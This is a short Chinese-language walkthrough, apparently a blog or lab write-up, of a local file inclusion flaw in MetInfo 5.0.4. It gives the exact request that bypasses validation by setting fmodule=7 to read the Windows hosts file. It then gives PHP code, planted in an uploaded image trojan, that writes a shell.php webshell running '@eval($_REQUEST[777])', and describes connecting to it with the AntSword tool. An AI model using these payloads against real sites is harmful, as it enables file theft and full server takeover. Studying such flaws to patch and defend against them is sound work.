metinfo_5.0.4_lfi

metinfo_5.0.4_lfi_第1张图片

产生文件包含的文件为/about/index.php

metinfo_5.0.4_lfi_第2张图片

尝试输出$module。在源码中添加echo代码,查看页面显示效果

metinfo_5.0.4_lfi_第3张图片metinfo_5.0.4_lfi_第4张图片

metinfo_5.0.4_lfi_第5张图片

查看module.php文件

搜索fmodule 变量,发现只有当 fmodule 变量,发现只有当fmodule变量,发现只有当fmodule!=7 时,会对$module进行验证。

metinfo_5.0.4_lfi_第6张图片

提交参数【?fmodule=7&module=c://windows/system32/drivers/etc/hosts】,此时我们已经改变了$module的值,其值为hosts文件的绝对路径。

文件包含的危害之一就是文件读取。

如何证明该漏洞是文件包含漏洞,如果在执行命令后PHP代码执行了,那么就是文件包含漏洞。

如下页面显示成功而不是show.php源代码,php代码执行,说明是文件包含漏洞

metinfo_5.0.4_lfi_第7张图片

根据之前的分析,在module.php中,当$fmodule!=7时会对$module进行一系列赋值操作。为了绕过对$module的验证,尝试将URL参数中的fmodule设为7。

metinfo_5.0.4_lfi_第8张图片

发现输出了我们传进去的module的参数,所以接下来配合远程包含,上传图片马,在图片马里加入代码

phpinfo();?>

  1. file_put_contents('shell.php','@eval($_REQUEST[777])')?>

发现利用成功,在同级目录下创建了shell.php,接下来我们用蚁剑,利用成功

metinfo_5.0.4_lfi_第9张图片

你可能感兴趣的:(网络,服务器,运维,安全,windows)